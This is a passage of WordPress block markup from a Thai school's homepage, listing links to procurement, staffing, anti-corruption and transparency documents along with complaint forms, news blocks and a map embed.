href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} 